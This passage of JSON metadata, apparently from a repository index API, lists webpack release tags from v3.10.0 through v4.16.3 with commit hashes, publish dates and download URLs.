:null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url"